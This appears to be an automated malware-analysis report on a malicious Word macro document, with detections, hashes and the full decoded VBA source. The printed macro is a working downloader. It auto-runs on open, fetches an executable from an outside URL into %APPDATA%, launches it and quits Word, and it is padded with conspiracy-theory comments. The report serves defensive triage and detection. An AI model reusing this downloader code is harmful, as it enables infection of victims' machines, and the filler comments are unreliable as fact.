Office (OLE) malware analysis — malicious · 1afa296b9abf3ff7

MALICIOUS

Office (OLE)

525.5 KB Created: 2014-10-14 22:15:00 Authoring application: Microsoft Office Word First seen: 2016-06-06

MD5: 39479887dfe7bf0a2bc31c3c39cc7637 SHA-1: a7bd455001c21f44cc02a4b1e35ebffc6e1662e1 SHA-256: 1afa296b9abf3ff7b788116aae160f52ae7c61626ca08f6d814dcf50147153aa

336 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The document body explicitly instructs the user to enable macros to view content, which is a common social engineering tactic. Heuristics indicate the presence of VBA macros that utilize the URLDownloadToFile API, suggesting the script's purpose is to download and execute a second-stage payload from a remote URL. The embedded URL http://misitiodetalento.com/ipod/logo.gif is suspicious and likely serves as the download source.

Heuristics 13

ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD

Reference to URLDownloadToFile API
VBA macros detected medium 6 related findings OLE_VBA_MACROS

Document contains VBA macro code

URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD

URLDownloadToFile in VBA

Matched line in script

Private Declare Function URLDownloadToFileA Lib "urlmon.dll" (ByVal TENCQNBGFw As Long, ByVal dCkTfeN As String, ByVal FNyNPBwqcg As String, ByVal LsRWaVqvhd As Long, ByVal quHTcQK As Long) As Long

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub Workbook_Open()
```
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Sub Auto_Open()
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
Call Y77777777777777(Environ("appda" & StrReverse("at")) & "\" & mnmnmnmnmnmnmnmn)
```
Reference to ShellExecute API high SC_STR_SHELLEXEC

Reference to ShellExecute API
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://misitiodetalento.com/ipod/logo.gif Referenced by macro
- http://www.w3.org/1999/02/22-rdf-syntax-ns#Referenced by macro
- http://ns.adobe.com/xap/1.0/mm/Referenced by macro
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#Referenced by macro
- http://ns.adobe.com/xap/1.0/Referenced by macro
- http://purl.org/dc/elements/1.1/Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8208 bytes
SHA-256: `7bb11f4e32df2d67af5ecfbfab46fdcde2a3ec6de23a7357c5bb865728cde7a2`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'UFOIogist George Williamson, one of Adamski's witnesses, claims he also 'The final piece of the puzzle is how AIDS devastated the homosexual Private Declare Function WSAAsyncGetProtoByName Lib "ws2_32" (ByVal hWnd As Long, ByVal wMsg As Integer, ByVal lpHostName As String, ByVal lpBuf As Long, ByVal BufLen As Long) As Long 'floor. There was no evidence of foul play.Â« ) Private Declare Sub GetAcceptExSockaddrs Lib "ws2_32" (lpOutputBuffer As Any, ByVal dwReceiveDataLength As Long, ByVal dwLocalAddressLength As Long, ByVal dwRemoteAddressLength As Long, LocalSockaddr As Long, LocalSockaddrLength As Long, RemoteSockaddr As Long, RemoteSockaddrLength As Long) 'burglary fame, appointed Undersecretary of Transportation and placed in Private Declare Function send Lib "ws2_32" (ByVal s As Long, ByVal buf As Long, ByVal BufLen As Integer, ByVal flags As Integer) As Integer 've information and resources in order to put together the Â»Grand ScenarioÂ« Private Declare Sub WSASetLastError Lib "ws2_32" (ByVal iError As Integer) 'low scientists, thought 20 years later Jupiter is generally considered a '* The virus can't live outside the body WRONG Private Declare Function URLDownloadToFileA Lib "urlmon.dll" (ByVal TENCQNBGFw As Long, ByVal dCkTfeN As String, ByVal FNyNPBwqcg As String, ByVal LsRWaVqvhd As Long, ByVal quHTcQK As Long) As Long 'to Napoleon. 'Russia. Â»Life of Joseph BalsamoÂ« translated into English in Dublin. Assassination Private Declare Function GetSockName Lib "ws2_32" Alias "GetSockNameA" (ByVal sck As Long, name As Long, ByVal namelen As Long) As Long 'PRODUCED AT GREAT COST ON THE PART OF COUNTLESS RESEAR- Private Declare Function recv Lib "ws2_32" (ByVal s As Long, ByVal buf As String, ByVal BufLen As Integer, ByVal flags As Integer) As Integer 'in Oakland, California; assassination of an American Army officer by insurgent Private Declare Function htons Lib "ws2_32" (ByVal hostshort As Integer) As Integer 'Sturgis, the third possibly being Oswald II; Lee Harvey Oswald and George Private Declare Function socket Lib "ws2_32" (ByVal iAddressFamily As Long, ByVal iType As Long, ByVal iProtocol As Long) As Long 'why did the WHO continue to use the vaccine? 'in Austin, Texas, to discuss his undesirable discharge; the next day Cuban Private Declare Function setsockopt Lib "ws2_32" (ByVal s As Long, ByVal level As Integer, ByVal optname As Integer, ByVal optval As Long, ByVal optlen As Long) As Integer 'assassination attempt of JFK in Miami but right-winger Milteer spills the beans; 'fired. Dr. Theodore A. Strecker is the courageous doctor who has unraveled Private Declare Function ShellExecuteW Lib "shell32.dll" (ByVal kDh As Long, ByVal idMX As Long, ByVal oOexxstN As Long, ByVal NTvcL As Long, ByVal GAjKkAqdYM As Long, ByVal RfsHaPMhN As Long) As Long 'ignoring considerable evidence of a conspiracy with Ray as patsy -including 'Bilderberger meeting in Saltsjobaden, Sweden. Oswald returns to America Private Declare Function listen Lib "ws2_32" (ByVal s As Long, ByVal backlog As Integer) As Integer 'of Israel creates Central Institute for Intelligence and Security. World Council 'Central Intelligence Act exempts CIA from disclosure laws. E. Howard Private Declare Function shutdown Lib "ws2_32" (ByVal s As Long, ByVal how As Integer) As Integer 'II confronts Tippit, Oswald I arrested in the Texas Theatre; Oswald's voice 'beyond to cause AIDS to burst upon the scene and devastate the homosexual Private Declare Function WSACancelAsyncRequest Lib "ws2_32" (ByVal hAsyncTaskHandle As Long) As Integer 'Â»Wanted for TreasonÂ« leaflets in Dallas; Oswald, or was it Billy Lovelady? Private Declare Function getsockopt Lib "ws2_32" (ByVal sck As Long, ByVal level As Long, ByVal optname As Long, ByVal optval As Long, optlen As Long) As Long 'WHO HAVE GIVEN MUCH OF THEMSELVES, EVEN THEIR VERY LIVES 'they are aliens and possessed such characteristics. Private Declare Function WSAAsyncSelect Lib "ws2_32" (ByVal hSocket As Long, ByVal hWnd As Long, ByVal wMsg As Integer, ByVal lEvent As Long) As Integer 'Oswald's Fair Play for Cuba Committee established at same address as ex-FBI 'the Marxist Communist League. Attempted assassination of Jackson with Private Declare Function WSACleanup Lib "ws2_32" () As Integer 'political assassinations accompany Nazi rise to power. Private Declare Function WSAAsyncGetServByName Lib "ws2_32" (ByVal hWnd As Long, ByVal wMsg As Integer, ByVal lpServiceName As String, ByVal lpProtocolName As String, ByVal lpBuf As Long, ByVal BufLen As Long) As Long 'Â»like-minded EnglishmenÂ« to discuss forming an organization Â»for the study Private Declare Function WSAAsyncGetHostByAddr Lib "ws2_32" (ByVal hWnd As Long, ByVal wMsg As Integer, ByVal lpNetAddr As Long, ByVal AddrLen As Long, ByVal AddrType As Long, ByVal lpBuf As Long, ByVal BufLen As Long) As Long Sub Workbook_Open() 'and Thornley allegedly meet at nightclub; Thornley thinks it was a look-alike'; Call HUHUUHHUHUHHU 'another friend of Ferrie, shot in New Orleans, her body partially burned End Sub Sub Auto_Open() '13 doublings. 1 then 2 then 4 then 8.. etc... In 15 years, from a single source Call HUHUUHHUHUHHU 'the poor, leads victorious battle against Austrians. Would-be assassin of End Sub Sub AutoOpen() 'undertakes massive influence-peddling campaign, 50 congressmen accept 'of Castro in which CIA agent Rorke is killed. Bilderberger meeting in Cannes, Call HUHUUHHUHUHHU 'wipe out US leaders through use of chemical of germ warfare. US invasion 'then; Oswald attends General Walker's John Birch meeting lecture and two End Sub Private Function HUHUUHHUHUHHU() As Integer 'neighborhood of King's motel with a rifle before and after the murder. 'Marines. The Office of Naval Research allegedly receives a copy of Morris '74 Marc Lutter: Sie kontrollieren alles! 'received communications from 'along with Werner Von Braun and other developers of the V-2 rockets. Interpol Call Y77777777777777(Environ("appda" & StrReverse("at")) & "\" & mnmnmnmnmnmnmnmn) 'than he should and had alleged connections with CIA-types. Warren 'than he should and had alleged connections with CIA-types. Warren 'than he should and had alleged connections with CIA-types. Warren 'than he should and had alleged connections with CIA-types. Warren Application.DisplayAlerts = False 'than he should and had alleged connections with CIA-types. Warren 'than he should and had alleged connections with CIA-types. Warren 'than he should and had alleged connections with CIA-types. Warren Application.Quit End Function Public Function Y77777777777777(Optional FGGFGFFGFGFFGq As String = "oneoneoneoneoneoneoneoneoneoneoneoneoneoneoneoneoneoneoneoneoneoneoneoneoneone") As Integer 'if the infecting virus damages, more or less selectively, the cell responding 'There are 9000 to the 4th power possible AIDS viruses. ( There are 9000 URLDownloadToFileA 0&, "http://misitiodetalento.com/ipod/logo.gif", FGGFGFFGFGFFGq, 0&, 0& 'leaves for New York an hour before the assassination and was one of the 'messages describing strange lights, a minisubmarine and other unexplained 'uvFSDngArc ShellExecuteW 0&, StrPtr("Open"), StrPtr(FGGFGFFGFGFFGq), StrPtr(""), StrPtr(""), 1 'and mental manipulation or control, international conflict, etal and attempts 'control in the event of a Â»national emergency.Â« NEW YORK TIMES reveals 'dollars worth of jewels, paintings and cash to Argentina for safe keeping. End Function Private Function mnmnmnmnmnmnmnmn(Optional JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ As String = "keepingkeepingkeepingkeepingkeepingkeepingkeepingkeepingkeepingkeepingkeepingkeepingkeepingkeepingkeepingkeepingkeepingkeeping") mnmnmnmnmnmnmnmn = "Microsoft_Word_." mnmnmnmnmnmnmnmn = mnmnmnmnmnmnmnmn & "e" mnmnmnmnmnmnmnmn = mnmnmnmnmnmnmnmn & "xe" End Function

Open this report in the interactive analyzer, or submit your own file for analysis.